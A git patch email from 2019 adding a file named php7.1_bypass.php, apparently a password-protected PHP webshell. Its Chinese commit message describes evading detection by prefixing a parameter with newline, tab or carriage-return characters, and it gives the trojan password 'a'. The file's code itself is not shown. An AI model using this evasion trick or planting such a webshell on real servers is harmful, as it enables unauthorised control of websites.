From c290a06bc9d9351e46f7a821f1aaeb5e81f6c8b5 Mon Sep 17 00:00:00 2001 From: tennc Date: Fri, 6 Dec 2019 18:33:51 +0800 Subject: [PATCH] Create php7.1_bypass.php MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit from : https://www.anquanke.com/post/id/193787 参数$b的前面加上“n"就成功绕过了,当然同理,你也可以在参数$b的前面加上"\"、"\t"、"\r"等等也是可以绕过的。 在参数$b的前面加上"\n",""、"\t"、"\r"等等也是可以绕过的。 木马密码:a --- php/php7.1_bypass.php | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 php/php7.1_bypass.php diff --git a/php/php7.1_bypass.php b/php/php7.1_bypass.php new file mode 100644 index 0000000..40272e3 --- /dev/null +++ b/php/php7.1_bypass.php @@ -0,0 +1,5 @@ +